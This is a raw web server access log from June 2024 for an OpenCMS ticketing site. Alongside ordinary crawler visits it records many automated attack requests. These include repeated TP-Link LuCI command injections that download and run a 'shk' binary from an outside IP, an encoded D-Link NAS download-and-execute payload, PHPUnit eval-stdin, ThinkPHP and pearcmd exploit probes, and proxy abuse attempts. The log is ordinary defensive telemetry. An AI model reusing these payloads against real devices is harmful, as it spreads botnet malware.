87.121.69.27 - - [21/Jun/2024:00:00:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.148.10.174 - - [21/Jun/2024:00:27:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:00:27:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 70.121.84.124 - - [21/Jun/2024:00:29:52 +0200] "GET / HTTP/1.1" 404 - 70.121.84.124 - - [21/Jun/2024:00:29:53 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 70.121.84.124 - - [21/Jun/2024:00:29:58 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 83.97.73.245 - - [21/Jun/2024:00:38:33 +0200] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - 83.97.73.245 - - [21/Jun/2024:00:38:39 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 167.94.138.48 - - [21/Jun/2024:00:39:08 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 167.94.138.48 - - [21/Jun/2024:00:39:18 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 167.94.138.48 - - [21/Jun/2024:00:40:08 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 167.94.138.48 - - [21/Jun/2024:00:40:17 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 52.167.144.140 - - [21/Jun/2024:00:48:55 +0200] "GET /ticket2/opencms/en/venue/?venueid=69923349-A528-C93F-2999-4DA35CF7FB58 HTTP/1.1" 200 63648 117.248.79.241 - - [21/Jun/2024:00:55:45 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 - 36.99.136.136 - - [21/Jun/2024:00:59:56 +0200] "GET / HTTP/1.1" 404 - 88.249.103.141 - - [21/Jun/2024:01:04:41 +0200] "GET / HTTP/1.0" 404 - 167.94.138.35 - - [21/Jun/2024:01:33:13 +0200] "GET / HTTP/1.1" 404 - 167.94.138.35 - - [21/Jun/2024:01:33:26 +0200] "GET / HTTP/1.1" 404 - 167.94.138.35 - - [21/Jun/2024:01:33:29 +0200] "PRI * HTTP/2.0" 505 - 40.77.167.108 - - [21/Jun/2024:01:53:33 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 40.77.167.108 - - [21/Jun/2024:01:53:34 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 40.77.167.55 - - [21/Jun/2024:01:53:39 +0200] "GET /ticket2/opencms/en/venue/?venueid=1E6F661B-8D12-844B-5F2D-01422A9038BD HTTP/1.1" 200 63657 8.218.121.145 - - [21/Jun/2024:02:11:50 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:51 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:52 +0200] "GET /ticket2/opencms/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:52 +0200] "GET /ticket2/opencms/vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:53 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:54 +0200] "GET /ticket2/opencms/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:55 +0200] "GET /ticket2/opencms/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:57 +0200] "GET /ticket2/opencms/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:58 +0200] "GET /ticket2/opencms/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:11:58 +0200] "GET /ticket2/opencms/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:03 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:03 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:04 +0200] "GET /ticket2/opencms/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:05 +0200] "GET /ticket2/opencms/lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:06 +0200] "GET /ticket2/opencms/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:06 +0200] "GET /ticket2/opencms/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:07 +0200] "GET /ticket2/opencms/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:08 +0200] "GET /ticket2/opencms/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:10 +0200] "GET /ticket2/opencms/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:10 +0200] "GET /ticket2/opencms/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:11 +0200] "GET /ticket2/opencms/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:12 +0200] "GET /ticket2/opencms/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:13 +0200] "GET /ticket2/opencms/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:13 +0200] "GET /ticket2/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:14 +0200] "GET /ticket2/opencms/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:15 +0200] "GET /ticket2/opencms/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:16 +0200] "GET /ticket2/opencms/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:16 +0200] "GET /ticket2/opencms/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:17 +0200] "GET /ticket2/opencms/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:18 +0200] "GET /ticket2/opencms/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:18 +0200] "GET /ticket2/opencms/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:19 +0200] "GET /ticket2/opencms/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:20 +0200] "GET /ticket2/opencms/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:21 +0200] "GET /ticket2/opencms/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:21 +0200] "GET /ticket2/opencms/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:22 +0200] "GET /ticket2/opencms/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:23 +0200] "GET /ticket2/opencms/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:24 +0200] "GET /ticket2/opencms/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:24 +0200] "GET /ticket2/opencms/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:25 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 404 - 8.218.121.145 - - [21/Jun/2024:02:12:26 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 83.97.73.245 - - [21/Jun/2024:02:49:14 +0200] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 - 78.108.177.51 - - [21/Jun/2024:03:24:38 +0200] "GET / HTTP/1.0" 404 - 66.249.66.162 - - [21/Jun/2024:03:36:55 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 66.249.66.161 - - [21/Jun/2024:03:36:56 +0200] "GET /ticket2/opencms/en/venue/?venueid=84B906DE-B460-D444-68C7-D7444F9F1F9B HTTP/1.1" 200 63651 87.121.69.27 - - [21/Jun/2024:04:02:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 40.77.167.38 - - [21/Jun/2024:04:05:33 +0200] "GET /ticket2/opencms/en/venue/?venueid=0D8FB175-8FD4-BBC9-1FBC-8F0EBFF5E13C HTTP/1.1" 200 63616 45.148.10.174 - - [21/Jun/2024:04:16:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:04:16:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:04:25:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 114.119.146.98 - - [21/Jun/2024:05:08:38 +0200] "GET /ticket2/opencms/en/venue/?venueid=1F00A8AC-73C6-30FB-6A89-C32972FA150C HTTP/1.1" 200 63613 66.249.66.160 - - [21/Jun/2024:05:10:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672 13.64.211.39 - - [21/Jun/2024:05:20:46 +0200] "GET /ticket2/opencms/version HTTP/1.1" 404 - 185.242.226.109 - - [21/Jun/2024:05:34:09 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.242.226.109 - - [21/Jun/2024:05:34:10 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 66.249.66.161 - - [21/Jun/2024:05:43:58 +0200] "GET /ticket2/opencms/en/venue/?venueid=CB444C4A-4CCE-4670-714E-21D950F578CB HTTP/1.1" 200 63646 198.235.24.215 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 198.235.24.215 - - [21/Jun/2024:05:45:46 +0200] "??|w?_?}??I???H-*???c?D?.?X???h???/?+?0?,???'?#?? ?(?$?? " 400 - 40.77.167.49 - - [21/Jun/2024:06:26:37 +0200] "GET /ticket2/opencms/en/venue/?venueid=4A86096C-BDB9-466D-4A7C-CDB7210B5799 HTTP/1.1" 200 63646 64.62.197.232 - - [21/Jun/2024:06:39:25 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.62.197.229 - - [21/Jun/2024:06:46:28 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 64.62.197.229 - - [21/Jun/2024:06:48:33 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.62.197.229 - - [21/Jun/2024:06:48:34 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 40.77.167.48 - - [21/Jun/2024:06:48:38 +0200] "GET /ticket2/opencms/en/venue/?venueid=02C2C7C6-9BB6-F13B-26C3-941A9A3FEDB3 HTTP/1.1" 200 63669 64.62.197.232 - - [21/Jun/2024:06:51:08 +0200] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 - 66.249.66.160 - - [21/Jun/2024:06:59:58 +0200] "GET /ticket2/opencms/en/venue/?venueid=38FFD183-CF6A-3217-EBBF-18C6D52232E9 HTTP/1.1" 200 63642 205.210.31.2 - - [21/Jun/2024:07:08:57 +0200] "GET / HTTP/1.0" 404 - 176.58.108.181 - - [21/Jun/2024:07:16:38 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 176.58.108.181 - - [21/Jun/2024:07:16:38 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 176.58.108.181 - - [21/Jun/2024:07:16:39 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 141.98.83.197 - - [21/Jun/2024:07:19:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:07:19:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 141.98.11.67 - - [21/Jun/2024:07:28:16 +0200] "GET /ticket2/opencms/index.asp HTTP/1.1" 404 - 91.224.252.60 - - [21/Jun/2024:07:31:14 +0200] "GET / HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:07:33:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:07:33:14 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 143.198.143.248 - - [21/Jun/2024:07:35:03 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 34.76.96.55 - - [21/Jun/2024:07:40:37 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 111.7.96.147 - - [21/Jun/2024:07:55:56 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 114.119.151.237 - - [21/Jun/2024:07:58:51 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 141.98.11.15 - - [21/Jun/2024:08:00:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 66.249.66.160 - - [21/Jun/2024:08:14:58 +0200] "GET /ticket2/opencms/de/sport/fotbollsbiljetter/serie_a/ HTTP/1.1" 500 - 64.62.156.115 - - [21/Jun/2024:08:22:36 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:08:22:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 64.62.156.121 - - [21/Jun/2024:08:22:56 +0200] "GET /favicon.ico HTTP/1.1" 404 - 64.62.156.113 - - [21/Jun/2024:08:23:07 +0200] "GET /?format=json HTTP/1.1" 404 - 64.62.156.112 - - [21/Jun/2024:08:23:14 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 - 102.129.252.240 - - [21/Jun/2024:08:31:40 +0200] "? ?q ?$I????|I'???H??-D??Le"A ?]?m?Wfk_?????*???IV??djo?A8?aV?,?0?+?/?????????????????$?(?#?'?" 400 - 94.156.66.82 - - [21/Jun/2024:08:58:43 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 141.98.83.197 - - [21/Jun/2024:09:05:24 +0200] "GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=ZWNobwktZQkiXHg2M1x4NjRceDIwXHgyZlx4NzRceDZkXHg3MFx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2JceDIwXHg3N1x4NjdceDY1XHg3NFx4MjBceDY4XHg3NFx4NzRceDcwXHgzYVx4MmZceDJmXHgzNFx4MzVceDJlXHgzMVx4MzRceDM4XHgyZVx4MzFceDMwXHgyZVx4MzdceDM4XHgyZlx4NzNceDY4XHg2Ylx4MjBceDdjXHg3Y1x4MjBceDYzXHg3NVx4NzJceDZjXHgyMFx4MmRceDRmXHgyMFx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM0XHgzNVx4MmVceDMxXHgzNFx4MzhceDJlXHgzMVx4MzBceDJlXHgzN1x4MzhceDJmXHg3M1x4NjhceDZiXHgyMFx4N2NceDdjXHgyMFx4NzRceDY2XHg3NFx4NzBceDIwXHgyZFx4NjdceDIwXHgyZFx4NzJceDIwXHg3M1x4NjhceDZiXHgyMFx4MzRceDM1XHgyZVx4MzFceDM0XHgzOFx4MmVceDMxXHgzMFx4MmVceDM3XHgzOFx4M2JceDIwXHg2M1x4NjhceDZkXHg2Zlx4NjRceDIwXHgyYlx4NzhceDIwXHg3M1x4NjhceDZiXHgzYlx4MjBceDJlXHgyZlx4NzNceDY4XHg2Ylx4MjBceDY0XHg2Y1x4NjlceDZlXHg2Ylx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2IifHNo&user=messagebus HTTP/1.1" 404 - 83.97.73.245 - - [21/Jun/2024:09:24:56 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - 45.156.128.37 - - [21/Jun/2024:09:41:43 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:09:46:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 83.97.73.245 - - [21/Jun/2024:09:47:38 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:09:49:15 +0200] "POST /ticket2/opencms/ztp/cgi-bin/handler HTTP/1.1" 404 - 86.142.56.12 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 86.142.56.12 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 86.142.56.12 - - [21/Jun/2024:09:58:53 +0200] "GET / HTTP/1.1" 404 - 40.77.167.8 - - [21/Jun/2024:10:15:56 +0200] "GET /ticket2/opencms/en/venue/?venueid=FFA115B2-38B9-DF68-21D2-8F2E64EF271D HTTP/1.1" 200 63627 45.148.10.174 - - [21/Jun/2024:10:18:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [21/Jun/2024:10:18:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 115.231.78.10 - - [21/Jun/2024:10:39:45 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 115.231.78.10 - - [21/Jun/2024:10:39:53 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 115.231.78.10 - - [21/Jun/2024:10:40:00 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 141.98.83.197 - - [21/Jun/2024:10:50:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:10:50:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 45.128.232.200 - - [21/Jun/2024:10:54:01 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 - 87.121.69.27 - - [21/Jun/2024:10:55:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 10.140.0.48 - - [21/Jun/2024:11:10:05 +0200] "GET / HTTP/1.1" 404 - 45.55.47.252 - - [21/Jun/2024:11:39:41 +0200] "GET /ticket2/opencms/ab2g HTTP/1.1" 404 - 45.55.47.252 - - [21/Jun/2024:11:39:41 +0200] "GET /ticket2/opencms/ab2h HTTP/1.1" 404 - 45.55.47.252 - - [21/Jun/2024:11:39:41 +0200] "GET /ticket2/opencms/alive.php HTTP/1.1" 404 - 45.55.47.252 - - [21/Jun/2024:11:39:44 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.55.47.252 - - [21/Jun/2024:11:39:45 +0200] "GET /ticket2/opencms/t4 HTTP/1.1" 404 - 45.55.47.252 - - [21/Jun/2024:11:39:45 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 45.55.47.252 - - [21/Jun/2024:11:39:46 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.55.47.252 - - [21/Jun/2024:11:39:46 +0200] "GET /ticket2/opencms/teorema505?t=1 HTTP/1.1" 404 - 138.246.253.24 - - [21/Jun/2024:11:47:04 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773 115.231.78.12 - - [21/Jun/2024:12:03:20 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.191.126.213 - - [21/Jun/2024:12:30:34 +0200] "GET / HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:12:38:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [21/Jun/2024:12:38:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 141.98.11.179 - - [21/Jun/2024:12:41:27 +0200] "CONNECT ecaravan.gr:443 HTTP/1.1" 400 - 94.156.71.249 - - [21/Jun/2024:12:50:11 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 195.246.120.122 - - [21/Jun/2024:13:06:14 +0200] "GET / HTTP/1.0" 404 - 114.119.141.139 - - [21/Jun/2024:13:16:41 +0200] "GET /ticket2/opencms/en/venue/?venueid=E8185E56-FFAF-A64F-92CD-A3B859A1CE98 HTTP/1.1" 200 63624 103.186.161.60 - - [21/Jun/2024:13:22:50 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:50 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:50 +0200] "GET /ticket2/opencms/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:51 +0200] "GET /ticket2/opencms/vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:51 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:52 +0200] "GET /ticket2/opencms/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 103.186.161.60 - - [21/Jun/2024:13:22:52 +0200] "GET /ticket2/opencms/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 